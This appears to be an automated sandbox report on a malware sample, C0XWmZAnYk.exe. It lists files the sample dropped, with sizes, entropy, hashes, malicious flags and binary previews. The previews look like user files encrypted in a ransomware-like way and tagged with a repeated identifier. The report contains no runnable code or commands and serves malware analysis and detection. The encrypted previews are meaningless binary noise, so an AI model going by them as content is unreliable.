              Preview:.PNG."&t.m......Nr.bn3.Q.d...........n....D....J(V.....Y;h.....<..D)O.c...Y.9.......^.b....5.0.]Xm.V#'...+..z4.._......F.B....s..q.7E...j'.1...........lW.+cCc.<..k3....%...;.9.PI_...b-w...A.d.~..........M*.=qw.F.......!vf....,..0.u..h.b...g.....7T...2&.{.K..!....H....v?..{r......{..Y9.hR...=E..u...#....1..34...we6v.wG..........\!..h./...-T[.."....%J...D.-V....T>.B..yb....5.5G.i"..g..V..dj7......xgo9.t.}*N...@D...N#....([...../k.,......?.............i.4,{x.|..>..8.S21..)......6<..7.!6...1[..y..O .......!...}r.R..$.........q.'..| .u...T. W.....pI..!.!?..P..}.8..L...&U#;....Tn...>..r.Z..aS+........o.:$}....L.....t..7...{o]U8..gd.F.H'..h..E.'..I..Y..7....Zhu....\.....\*.;....|gR.3.c.^....L.......h..|a.<.............C>.Oo..UF.......7...<..+...8.....N.1I......O5.v.!.m85..VD..A..?.H.,...y.%.1.G ....|8.m5Iu.8....P.....<...w.u...*.T.....@.F..qZ.V.F...M.....s-;@.|..t.....7(\a8Ck.<.oO..&.[rd...No"!..M....{...C4c_......c..d...^.....(,..s^.{..^%...p
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):18852
              Entropy (8bit):7.9920127831375085
              Encrypted:true
              SSDEEP:384:FVzSWULZVb0a+0Q8HgWA9F8Qz6mcWTpQuKYYOSryDDevMC:/zSjw0NAWYYWdQuKYTXo
              MD5:61AC49EA230FE11A504453EDF71E6396
              SHA1:249D7E7A843520DD98851500698C4F55442D6C77
              SHA-256:BB76B5D98949318787CD19AD7F4824DD91A74A1FE5EFC1F8A614FDD315A1029A
              SHA-512:89F528CC9B379B8FBB4E4728B45F9A2B7630AFD05A2BD4111C7988C48C7F7F4CE89B53394B2137C8E962C7A626C35AADC5E5BE0BCD903E42F43A9C57A513B3F1
              Malicious:true
              Preview:[{"de..g'O..g...i.A.|...m...F../...8o.ZRAG.I....:...'DNl.Uq...k........R.....-........sE.....O..q....C.D...Rlux.u.I.5.......=.....j..#@At......YL./.f...y.s.....-BD.L[.t......T......oS..B.L...q..}...Z`..`R.Q..Ay6.G..u-.h#.{.lcEH|.O.(....q.c....k....7..t......M.%&m.B...B.....x.D.R.E._j....^kBK..,.R<;....$...V...%...VU..........uJ.k....8.:.#(9..od.k....l%.2....c..l.1..q....>..pG...}.9.Y..k.n..5 du..JI..2..k.vL.-.Ml..Kl.6Wj....H$.8L.-...........d..2.-.P.x.0....P.E{..#.".n:S.....?.tok.D.N..+.-.w.....`..V.l.....].._....lK.....4..5.Ct.p}.5......g..i..OD.'g=..nR6_.HG;..hV.........7v;.`CP..".E.|.....y9...y....t....@..~.mZ.]Iw.)r....sM......]...F..d+'3y....*......+,......._R{.....x..)..2....8.qa.U ...@...%...X8F7H.O.Sh`1..{ll..2.[.]'.cA)~.d.....x.#...d........[..'...o...~.V..F:@D.mi....t..p.HTg{..z......}.9P;I..9.t.j.*..yt.......l.....L..-[.%$C)...A....E.}.....!g.a=R..H..P......=J...^.-..../....j.P.....f.6[......OY.>.x.z...lw...Na.N.n.H...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1188
              Entropy (8bit):7.832618812413829
              Encrypted:false
              SSDEEP:24:SOdJu158P9Azzj1BYMWjuyW0s4cWy6Rl6xJd2HrsIc/d+bD:SOdCWlA/jmjk4LUcLsv8D
              MD5:42B278CCF549728FBAFC692437E10636
              SHA1:C65423BDFAF2722F53DEF2C8F8FC9C380662AA34
              SHA-256:C8511EE37146C61FEB1D80790965256ABC46EB2A1E887B7ED42842D7B16B1811
              SHA-512:1D1A07C2DD854EB691C3F5679B00673279CD5DD59C1C66B13B82F84CCAA2F36E9F173FB74C4303C2688753DB31D05557F4C3D070E4492B8477745EB7D9A44AF9
              Malicious:false
              Preview:{. ".|s...D.......wsZaU..!..$t..aE#..T.vH....y..u.7q......1.D.c.N{...=.....G...[p(`Oo......#0-hj..I.t..e..<.8....6..n.........;E.*....i.8.b!....a..7........J...Dm...r..H..../N..+.....k....'_..)[.......IY.<.<.|.k.!..%....Y..Z..]............}..N|.......VF.Tt.|c:X...S..g....HL*..vx.....2...zwFp.=..;........L.&..O..N..%....N..^E.):...M.....Ss.q....Z..]-(.._..PP1+.)F.DL.....@ ....Wm)...m...m..Z..5^Y./.w..E..I@.]..T.m.].-..-.M.G.f..]=..7..0..b.......a...Y.E...Bf...L..,.[...h....J._....,G]0..d0.^n.[...,.....^.....d.x<E....w.....[-D......4...O..hH..$.#:T.m..)...m).......#..D..W.]... !..T.e(.....-s..$.....8.`..T..;.:....1'..q... ...r......s.....b.._..9.C.m)...$z.L.(....D....r...om.>1*..P........[W...\Q].?.I<3Ya...h4......C+:j...m...c..4\..4d.&A....!.U.......2R.U.|.Vv.g~p..>.o....BD......{b.F......'.C`-mu........e.|.4E....E.. .....\.=.4i_.....s.gd..[.I..l..,v.A..4X.+hV.^.m<...~Ed.RT.%`@&.(.!SA.E..P.....B5.....{.......J...di.fH.z..B^...^o...6.....C.O:H.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):80603
              Entropy (8bit):7.997766472137727
              Encrypted:true
              SSDEEP:1536:1U/VpdnLcSv3IVcJbp+rnJEYysuGEUOZ6WiW5s26S/iK9F/E+LhObTM:1UFvZ0JosYULd12Lb3/E+EPM
              MD5:5A93206B250166DE093CD10DA79BB7FE
              SHA1:78B3B584F7090C5658D7125C82AB0A61A81E568D
              SHA-256:2360E65E2F6C9877A001A36A6D8A04E1F87639D82F951D63D2053955932FD7B4
              SHA-512:B1893C1212BC922BA8173EF423F96140991EA53F76C263077CAEE66CD9974A273F152DC43C465A519995EE6509B41389518D1F3211283F3019D483174EEB79FF
              Malicious:true
              Preview:/*.. .UQ..z?%.....1.1..\....Q...r...>.SE.|.2@....w:wT.[.mQ...J;...._u.0*Z}..4]..w.p.kZE.-.O...m.'..Nc..gH..{..._|i....R..D..5..6.q.p.xa....V.`gu...V.^..A+....D.D...C.j=.c......I...W.NS...j%"..PF...@...D.9.....K=..H..x.\{..(@`..q....O.6.....T....K...s..~.u...P1...Wt...-f...K.[..A.[B...9#..O.....7..."..2P..d..p.....Y.V.CE...l.f..5]]..!.Z..2^...?......J.U8..E.k..yZ....N.?.o..:.UB ...i....C.4.....wrf..h..g@~.E....E.......>...WB.x`%..W.u....-n..i]....".. .-.e.....T?..B........o.?.6..`=.S.~.].C..s.d...$h[r.....TW'.y.)....M\....b.>.K.\.. &.7:..J....a......eY..@~..._j~!.....jg..MP.0:..".W..6...*NX|v.r}./%u.u.v..._......|M.T+.=^....F.t..sE{....Mu..,G...I*........ ....t[...N...W...rK....Km........r.-.......+T........._?.....C..<C....GE..m.*.,5.|.L.".S.c..b.......Fv T.<..[.].......r....3.!..K<..`......!...\t.;.Hy..FS..[....Wu...j.......1.V ...)?`..q..^'..........*z..@.....]u..C........3.....0a.......o.....0..1X.z.).....ugEzr.....VC.@<.}.J. ...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2731
              Entropy (8bit):7.921353128192037
              Encrypted:false
              SSDEEP:48:pS3Az9rS5SWVKq/xViEDKLw09iKD9pioodp2EtTfPohIOXeSW+sEfbAPYay0cUgH:pSQA5xKExwE92nk2YYWvr+nsPYajgH
              MD5:F194D7A20E2E5655644E07D8EE2A2C85
              SHA1:6F6334E928734A25C5CE19F54B0EEE8BC5079029
              SHA-256:DF72FCF84A2725A926D3F58FE9EE606388F8B6AA5C0DA0653B99469C813275AD
              SHA-512:8C835F61A59A12821524732DF5EA01B3FD3B6B9E91688542B601706579DFAC28BAA9F78A18DE0CF20509F4D48E94A18E5E4E6751DB4C116948880537CC5D4570
              Malicious:false
              Preview:{.. ........T./l....9.3V.O..r3.02l...6-V..h......0w.A.G....,.*..'.;@..l.S.OT.oa}..!..Z.yK......l.B....+.5%.'.s=?hO..n.....k1..'..<.S9e..i..7..HQ3W....(-"V..xQ...*#....va.....j^]>...5.gr.E.2.V..ZIy~.z.%S..76.z#....Y.......=.Q.`.\........&.A....,M........wFa.....1d..D.JYU.O...........M2...m..KEx..qK....h.TS.Ab...>d.8..IV. 1z.........3.cs.h..EmNJ.=.gH.&..K8.F.'HV..V..>.P.T....B..F..7l.U.uyt.....z{....5.A.V`..s|..6....Dv.}.2.zm8.z.x.......!e..`O...dG..h...c.$.x_23l.|.....6hW..pVv...y9.gN.7...~.*v.......r9.A_..0.f..[.9...}(.F.(.X:.T.......gm...`*&...S...C....&..'....z....].h...?..(...(..`.t.,.7.n.0.......4.&....p.N-..9..+...IQ.r...">...Ar...&a.coS%..=...j9..f...xS].Y.!..2"r...[.A_.56...o.=.S%C...z....Rr.*e.'...!.d>.iq.Ma.}...dt...*..E`n.,".k.....;.,.N ...B.K=...7.h..{UZ m....d.2...... 1G.`.gD0;...<..*e....L..:.....LC...y.(.>L.,....r).LW.~..G......4..=X...a.......V9.._...f..:Y....B..dc.EH..E..v.,...n...g"#.oU..L.p.....=...z....(g....e.h..w#...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):625
              Entropy (8bit):7.634759787654021
              Encrypted:false
              SSDEEP:12:2fs4fiLCtK3OioyiYm56b/gEKDDfCjYaKuH+9n66d6Kdxa3cii9a:2fs4Rvymy/gTDYYzbxl6Kd+bD
              MD5:4DFAC25033C88D5CBCD0E2AB24579034
              SHA1:EDFCBE93A42F5D7BC33327ADA57D3C2190B92007
              SHA-256:B20621E747E4DDFFDA94A716AD005947617790E80969F959F0F847F256D4D910
              SHA-512:42CFB7F0B03F7694B2768AC70D3B3133CD4A9C13E8B7F6277CB137F8EF5E8E83D73A527B431682FB8B731B5025A8C2C1785156FF5AF0E825663C8C4165C04D68
              Malicious:false
              Preview:(func..<%.6q!w......ij.a....N.s..J..B4....U."wvd...+.B.:#&....l*y...K..Z1..;.Q.Z5^vVX.t3.;..i..s..d.....!L...).=..E..v.>.u..ZY..e...`v&x....../uV._....-Y........&..M..lw.|.......J.(.p...&.a.........P}?...)7....?OS.,.q...h......._(..zJ.(>. .I.s.........'.R..g.T3.j.B...>.....rw..8.....Ko.5...~..E#k...a.J0.Q.H7.P.....4.S....'..W.j.]....8&..r..T.-....g.:.E!=...x^......>....F6...Z.}...`.+.V.7.....Z :._....`......./....CU...U..l....9.4..b...94}....&.T..S.../....gQb... 0.......#.+z..n`'`..H.YN.q).m.D.....&j0.>...!.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):763
              Entropy (8bit):7.684243837324912
              Encrypted:false
              SSDEEP:12:Yoo3PGH0SzJn46yjLTyGQaKIHhriAt/G1+syrvWaovM+GEquzuqdxa3cii9a:Y9OHXJ46yX+eKIHh+iRW9k+GEHuqd+bD
              MD5:F6D3F2AE4EE784917C2508AC20F7DEA2
              SHA1:3314282AB6CFEEA4447782D8B0EB253B94677A0C
              SHA-256:FCFDC79999C3B920839A449AC9D28BDD19DC9CC209C472A1A4C14F6420BFC992
              SHA-512:E1A02438EB3193553D016212DAD2BB28BC3A5AD7C449187FAFA5501C0E91DD12AD7D4B5F271257E1B7BC044128BEF0F86FF05A6635ED5199B3C1B57118034CAB
              Malicious:false
              Preview:{"fil.=.S....}.a..!r2........_.......0...L.....9.|.."4e..p6..9...E...M..|.R..U..:5..<*..^.{K.M.n.",...^...M.d.Z...... Gz..d...({+...N...8...Nf.vx..d.......#J.V..Y.7....Ch&...#/..3...x..+...B..>!C......j.......A.....).zU.+d..k.......p.|+...J..wF...WC._E&.Hp..Fp...A..Z0..&.; *..Vz...X..j<..vX....../D?.#.R-.......0..Aa5....c...L..k.W.z.bK....$+..B..hW2..f.f<?!q.x....K....*E.m..,T..N..P=.q...Ro.Z..'....=....W}|.z.....9.Un.D......x.A........5.....:R.w5...o.n.;.07..'.v.:....S.f.'6.9j..]6D'|..]...<..Nu.......}3".<\...N.$..<i5.`5..{E...>U.ec............J.....?..N...&..Ej.^.t.0....k.?.ic..c.C.<..t..d.q.]..9.6...<8s.-....<...8....F..z.^.}...)...P.8...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2087
              Entropy (8bit):7.920266732954213
              Encrypted:false
              SSDEEP:48:yUU5U341+wRPfslSyQ/lMJ87Ot/eNvsf3Y2PK/GdQ2uwV355RG8D:WmpUfsJkn0/eNOI2PWwzJXf
              MD5:9798AC29E1383B0DFF59968D344C9ED5
              SHA1:6FE256CBC0894F3FD54468AD1DE529F8A720EEAF
              SHA-256:DCBA4285CE9D5EDD176E113635F33E158674265D29D92C83AADBD15B4A1CA23E
              SHA-512:42C7CFE99BE6FF121F3C94010EE48B56834D8671833D8C54274DC1BC607163431297C5A6444C14AF13A388082C260C9E2333FF9012FC2F6B4A6BC2D9FE205630
              Malicious:false
              Preview:[.. ...4.T..P..c.7........5)@...V......x:.\.=...X.X.*..".1.R..8..P.F...0..W.j..;.tuq..E..{....."B.n..?wZ.l.$,.M..Yi....A.....o.4.G..T..z~=..$..`..........ZG......!..K....D]...><.l+..A...Y..Es..)...U...H.....|.-.W .Y..|7..M....R1=.E*... .H..M...55.3..G%Z.)M..d.q..".....&r.8H...V...fLMv..>..j.:...w.Guc..d......WPm].............6.R......1..).@..Z`..@.p.i.g.[....?...L....jY.8..fv......W&..~<e./.....1.p.......B...G.80o,..L....%\...;.T..@$....y.'...ze.4........}..0.@'...(....Jq.gt0...8.&..<cX0.....?.H...\Or..5.D......G..../..>s..w&}_.....iT{u....._..^..57..g..Y.'..ADu..Y6.q....../...f...;D.Ac.<~..I#8.l...>..B.|?aN...%.Y..:.O-K.p......".Q.h.3.;..e..^.C+.....J.....0;.pjB.?.\.sJ.]CF.ZT.C.SY...5gW.........^......R.3E.....g..r...d.v...^[.<....($.wh.-...@@\;X.k.Qm[......[.`....O!..j...X..w.....9b.[.7.B..pY.6..S..}N0..W..G.x#.jkT#..N|.{.B...t...L.......T....[u~Z..b......}O.~j-..1_.....E4........$...N}.....p...4&..........=4.G...G.N....)...y.[.F
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9751
              Entropy (8bit):7.981786499740963
              Encrypted:false
              SSDEEP:192:1FlPLwdxqYil6qWNvteKx1WEpM3QQjKJfWWbngo2lSDINcrhdqKk:1F5wbq/8IKlejcfLbghEh1sKk
              MD5:3CA694A1B25587F3982BEDBDC51FCA0E
              SHA1:10AA4A2281D8FE4BA5150B6914956A84722E9AFB
              SHA-256:0D65D7E5C30767EA8B0B91B49B377DF0ACB02D37C5FDD700D9B6E4E81B5824BF
              SHA-512:79723C55277F9E00AD87F649B03067798C2F6F56036F6E9600F06529E143C196DE4E8A31D786E77D947C5FCAA70822EB0534A17AF94386B07D2A64C22F3947AD
              Malicious:false
              Preview:(()=>.t..[.<.k.. S3E#.M.#l.V...l...5}*r.8..(.....<..%. ;W..H...RF.?.$q. .V a{../...s.7.#.1...............~...DQk..C....z..".[Kv.w4..:...M.>.....e.....4m.o.f..J..z.....f.........5.k..D,o.3...5.K0.r.-.bZ.z}...~.;B^.,(..`.ChNL...JI.6X.5.w*.......;E.....u..).2..g..@.%....w..G.n.8....y7<`..S..Ao.."..+.-.eY.LJW.....9.dL}%....C].y8..u.....\..L.z..i}.S.........k_..j.qrN...;...A....Ah {o.....%{y.x.1k..)q~dNi.."j.'....P..{...^..$J...^....2W_&..r..k.2...n..{.2u.......sD..ki...:V....N.."..+je..8...e..29...jE*n.h.p.5.A.%R..}A..rq.:.d.2.z....:..........Kn.ki.....5..s...&....i....gg.b..2...u;.P+..T.N..)e'.c.............AR-...*....tc.$..s.G._.13.^C..4..wc..Ev..A...,.{c....M...G.0.s.3r0..c &..i_...P.2.V...msk%.........:.....<1...cP......._..XhZ.....$.T<...........1.^...z.;.F.E.Q..i.{.l..._.qw.....n...j.x.?R=..)...eQ`.k]..,y.rt..7.7n.fJX...V.A.....Q....{.3\9.\.O..4.C..r..e*z;....>q..u.}..f..=.[/.=.x...h..8.;..-.|..j.......m..(..Pu.&..7:.._.....k.<.^.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):10104
              Entropy (8bit):7.981301017184946
              Encrypted:false
              SSDEEP:192:ykI2pkLkYs69gOnyZBkszYL70ICa0XKeTz/ynFzykvs5lP:YMYgoy7Hmw9a0hTLIRqlP
              MD5:862998A0931D2DFB4C57D1B994BBB498
              SHA1:5B41C72EFC6838E26C9FC74BA3202363454DAD74
              SHA-256:2C6CE2F6D419F6705A324A3F55A07F68B9E8D7292B2CE1EB0EC55AFD77F18C20
              SHA-512:E8C3479FC44359E5E76B021087D7ED795F903A7596F6353462EA98657DBE601489110AEFDAEFCEA3F8B45573889C81D366B5C6077F068BFD3762E697703F6ECB
              Malicious:false
              Preview:(()=>..~..v.02g.y.....yz.@!.i...d..=&..a....^.(..hf!+:Z.....G.gV.@... .....6.Wc+yV.l......4R.[W..7vp.*..H.=......._.Av...9._eJV*.~...{...G,[47..6.9....>9.n.0..?M".:C...8s.*..J......HY...O.!....<..!.#.=d......(<.k...W}.<.S......7..;.P.....y...J.d.rti..{$e..U..... ..}..6...|.m......s..&.@.9k.....]..{s.w..$...!..Nw1......1.a.)C..^$f\..m@A}A...n..El.......1..4k.L..W..M..N..-F`~?.j..%{=..!N6.....d.u~..1...d.eE....L.aSnQ.h..;f..6....0...d+5.+8.%.fB.v/.....,|*n..,Cm.[....Ut3Y..@......6....7........no.1.....x*.....2A.Q.BN...Q.W ./..+1 1..G"....MY.....+\...;........./];....6.8...A......c....'.u...D. ..\........K...a..\......y.Ly...6.F.F1!.....2..?...%.,......%.^.U..X..QI:..?..5.R.&;..j....;....3.*.......m..$.....?[O...|.h..r....5..Wa...9..e...1{..[d.m.=UVpV.N]....pA5.J...*.\6...PT...N7b1J.F..=Vw.xZ..E.@... N.[..#.....d`.`..4....B...A.4>H..t.f.0.*.8g!.@....4.....t'.'.xPl..c.ga....X.}...o..q..=..0..x...-.{a.p.m.2..e...2.&...o3.F.8j.Q?.-.(..c
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1296
              Entropy (8bit):7.8585117162432905
              Encrypted:false
              SSDEEP:24:OqUGCyAI8FazIOAf8XHXn9yY2/UyfEoEuDhksfqsnfHiOy56KsPFv2CmSyd+bD:ObGCJBFazIOAfuX32zso9hksiMHBqAF5
              MD5:F59669A68391C2690A1190501E88CB33
              SHA1:92D80462C74E844A0744008CBAF6950693002DB3
              SHA-256:58293D1E8F2067BDBB73250EDBB877BD56640F7164485556F7D652746BADCBD4
              SHA-512:BBEA7E91B67E3EE3C3C8A0287BE88723D6F0AEE6634055E59A4507B79FF74F72F9ACE1AB3DFF3602859AEB0F1187C8D4C3FB1544906802E1A13567576CC9DDE3
              Malicious:false
              Preview:{.. K...Gs.6u......]UY......C.O.v+..q..I.r$)6.f.#.W... .Hc..O";.4.7....R..R.>......I.o..]v.^.......e.Xi?..W.9...7.vX5.M....O.......B..o....a..?.....q..Hr^..av..=..\....@....4..lt.N....e>...Tk..~..m..t...k...."...K....a...P.n..E?5.D..L..f............>......=..-....M..V./..]..F..U8J7..E.^....b.....:\...tm@..h~..\......1.`..8/R....#Z.JW..B|-.....>....f\....j....;.Rk.!....X_..B..(.....H...j.?Uf...:..!dhm..N.....y.u..'JQ.7X.)80...;t8w..1.3...:.<.bP.......?....u....w.I/*.l4..)...GU&...fG{..m.Q.\g..H.r.}v.(e....M...../...P..I..a<..?......1.......h.-.;..W...)$/...H.....;b..I0P...\.s..`.W....4K..u.....;..;....T.m...y+.q.V...4.t...<......j.2J}...3..\....i..$V.T.C.Y...<.r.....-.:........V..-t.TI<6....*...`S/..3N....T..^.Z..~... =Y.Y...7.l.).,`^.jJ..#...p.SOQ.Pi...8..|.'Pa+.K...|i|..ZQ[f.._.5.sz..*........%..%W..t.4.3..+/$q.n_...[.....-.e.67_.0}.7.g....D.1....M.m...'....I.{..Wg.S.........2.......D.\..%.3..k...)H&A..ON..Yu.3)...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):452
              Entropy (8bit):7.409292743922297
              Encrypted:false
              SSDEEP:12:SMReIgDf/xCmsJNFeozqoF8tk4tVhdFQZ4Ldxa3cii9a:LA/UFfGY8tk4boad+bD
              MD5:522B0C1DFD6B21069C92397E808B91DC
              SHA1:542407896F0805BBCBEF56444DC1024BD98E4EE0
              SHA-256:4849D2C1A2F0C1A27DDA36C7AD96A36BC46113F39CC1F0581D3960B19CBF2642
              SHA-512:84D054609183A09F85D322A8A9EC4C2F9F17324B2B645E3C9A3492285A72D4B94FEEBF629406D37C8B72F4ACEA7060A45D884354037B2CCCED34A5C262072D67
              Malicious:false
              Preview:*...#..=.s3..b...a.N..[.{....G.T....m......9....xz5....N..C.....GbIH...d.G.[...}..pQ.$4..t.;..4.Ld..M..`..8.:.........F.?..d!.a....I.P...."..C.f...tKO.O._.X...O..-....<.......j.=...E.Wt.'..,..AD..I.]....cE.j...D.!.....F.J. s....5.....]LQa.uyJ..x[/..4.y.a.-...x.<......dgy,......0.g.....QX...v.y.vDG...h~.......T.B3Et.U.f.LM..O*w...r C..^.u.n.U..'.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):374
              Entropy (8bit):7.308060187373765
              Encrypted:false
              SSDEEP:6:UPLgA5zrr+18h0vzvMe6Oa7JVb4dFX9E0ngg2wkE1jFllURyFf0HCUCfPSdxa3cq:sgAw18hEvMelaF6F5qwkEjPUG0ifadx6
              MD5:05D0D4C852F2093AFB3660EC769618B4
              SHA1:85463394AD1806D747F465CCEE8298044828830D
              SHA-256:6194EAD939A5FA5A8F0A0B1CCADC33534879FC02C060A7E2765151878DA30AEA
              SHA-512:CA1AECB2CC7AFF2271E22F27265E44B260A19A46A4FE20F26884C9AE3B96E01195AEA1313683B544DB70B0928C3BBAB786192C8C4296C3FE49A73A64B104D89B
              Malicious:false
              Preview:.On.!-.....o..I...x..8..4m..M.[...q}..T@J.m.yv&#...y....o."...4..+..G....3....KdM1.=....:.]......./..p.S1.qW....c.e....C....};.+.|z....3..q...Dg._q.v7.../`...=8.B.O'.y...q...m.......B.I.)'.... ,.t.(AqSdi,>.od@{..)f..w6S.s.>.....Q.ET.E.&Z..I...E@0.i.Yb>r}.u.X..J....A.r3.Y..#9^..S..K...>.Z...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):683
              Entropy (8bit):7.659137205373021
              Encrypted:false
              SSDEEP:12:kiA5O61yNeakkdcNwPefMnv8/7tNZfRkX3iS5KQ682IYG1PZLUXM5dxa3cii9a:wyNHU6Pj8TnZfRoF6EbRPd+bD
              MD5:4FA84BBA88208334E9F9FEF4A2062BE2
              SHA1:EB3A8C5AD56383D6E3DB1AF5B6C2A289ABF1CF44
              SHA-256:435D4AD51795EA4EB9C3D0533E215F0C2DB116D0BA94CCC15DEDCD17E84897FC
              SHA-512:E960172A903A6DCFF0632C987BD95EC0D6B493B724FF2A73553F1F78AC1347D92864F9069569EC26003BCAB3233734CE83DB41C48C02CA7A2CB4213EDDCD1BC8
              Malicious:false
              Preview:2023/..}.....I4....</..*.s.......5..<.[.gQ"i.,.7...Jyx...Q.....ce.y..h}...R>..Ija9:.PhyX.h.....NU..VW...\s.N.jQ:......4XJM.m..t.i..jK.k.':...J...b.K.!..../...e...<k..3....y..,..\B.p..../..T..d.dO[..?........b..b.=.4...EAV3nH...2.....B`3M......R*V..A..S..LK..k.eDJ0.?f(..>O..G.?B@Z.MjNM.....u.......1#..N.v.....!.1..n...".q..{...).X0c....*C5...~6.=....f.,t.^.@H...r@.i.b..@.4%::%..g..a.Z..1p.+.$..s.kp1q(rIC..<.....Rk..*....?...r...F#..i.+%../N@.a|v.Y...X..&.O..!..Z..E...6..!.U..&.S.....$....$.C........L.$...;...Y...x......2..j/.dp^J...7.0cX...1..i.T.&.l[4X4..K...g....-.b.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):850
              Entropy (8bit):7.725819379266227
              Encrypted:false
              SSDEEP:24:S80MN/opYY8o/gOFzaHM7sk1dKtFRy7KU/4gt6d+bD:CY/CYYh7mshsR6Ta8D
              MD5:FD0D6E6567D5FD76C24B531F4880275D
              SHA1:648938FA88D833EB2713FAB4C3E58F8B873015BB
              SHA-256:F44C09BAD7FD708369084B5B090C24670E3BFD4841F7E54C6E8C173EA04C6AC5
              SHA-512:92B267252472D1D4D19C9B971BCAC59A626031BE57C2268DA4B1D0B5D07DFA0DD72106D05FB4D02908FAAC595E3559BE548B18A12C255D267734049E2FBB9C90
              Malicious:false
              Preview:A..r.^.... ...^C;..^v.k.<.j@..<.{....s.8.[5.t.#..PAZ?O._...-Z..JH...@..........b?..6g.9t.Av...{....po...AQ..vRg.........o$.9.^}..e..N.....s4....*D;..?5.C.8v..Q... .w.s.._.iC....t.ct.#.{.&.2#.....n..\.l.... .G........e8........l.o...t......y...g...w.k..A.f .......m.A..l#7.G=4./..........B...M _N.6.}..9..g.... .....{..x.F....w.D..Y...%..X)..>...OS:.B.-4.u...g._E%.K..P.d.O...9.iE@..&..Q).....fD...B.=L.E.?{....d+.%bw..l............6.^..[. .....w...v......|......."..v....>..-.h.c.t.Ul`E8J...%j...^.A.@`..]......uj....c.$.Fy.tA.y.2.@.%........ZKu.9kC....h'.}sV.c.%g..\...zY...j...._..4Wg7.0...K....)l..Z........CV.R.~.APD.t..6..Ij|....m......i.1.c..2.".<t..2./8..Q.q.gr..pU..^.FL...W..,..F.......b.c.......`.H..){..X..`.tI..Q+7:..?.GgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):655
              Entropy (8bit):7.625657124091065
              Encrypted:false
              SSDEEP:12:kXlHMzWChxHsdII5U1RJ6eVkFAM8W5iXrQvAMPMSnJdV5YdP+M+2n6D3cdxa3ciD:IWadICM3UAl6Yc4dPF+rAd+bD
              MD5:E110386BAF75E3DB0F17DD6C35181BCC
              SHA1:3854DE58C5624345C76E4A211061250C3072703E
              SHA-256:8CF8E43D8D70BF1F45AC874B0E9374ABE24859BE90926D7B7227E757AAED08FB
              SHA-512:6F67729325B29A942EA66F506F0B2B9F8E7658E8EA99175DF1991EF06D127BBDD19A1069BFD325CC9D7DFBB1267311E6630FBCCAC22F780452DDD1F7C943C23C
              Malicious:false
              Preview:2023/..P.].$.........C.A....v..........:.....8.'y.V....v.QF.......2.;.%<..".L....(.....A.`...z'.?..._2W.........p..j..1.....?B.P%cF..z.@.P'.z...y.>..)....7$<.j7!r.?...4.9......n.t(E.........+..Bi..}..[....R.h..>..R..<S.:.o .....;..[.2..k.6n.2.]......o."...af.z.c.......'.v.Hx[..37.%..mK..2..>..BjE.....^....t.2.!HG.j.E....(.'..#Cm[.ilv.......Q.l.\...h.m..c..=..[7.fa=.z.oS.........j.q.e....].c.4.....).%T....DdD......j.j.vC...u..%a.6..aiN...j.q...A..c..Y.......1.&U..yZ........*>........mw..T..L.?...L%t..Q.;.!V.*.Y.....$V.0...).%N...,].p.1.CgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):80530
              Entropy (8bit):7.997769555384081
              Encrypted:true
              SSDEEP:1536:wKDxnpWPMtASVH6gBZxrixpsh8ggqkbTooA9YXz:Rx6KvzrixpsiggqaThAYz
              MD5:FE64853B696EB20835FE13969E749CC5
              SHA1:3C995D9D5B000CA7A6FE24D066EAD67630ABD690
              SHA-256:540FC1E7258978D4F63C95ED4FD87315F56AE888D520D6941416D62507D8A78B
              SHA-512:ACC5352D20F2064A902510EFB551A9D2F715AA1C5DDB8DCBAAE591EEAEE1870E354B72B52DB2614A54F9D69B974429FDA71030832D782E9F47846880BE77B383
              Malicious:true
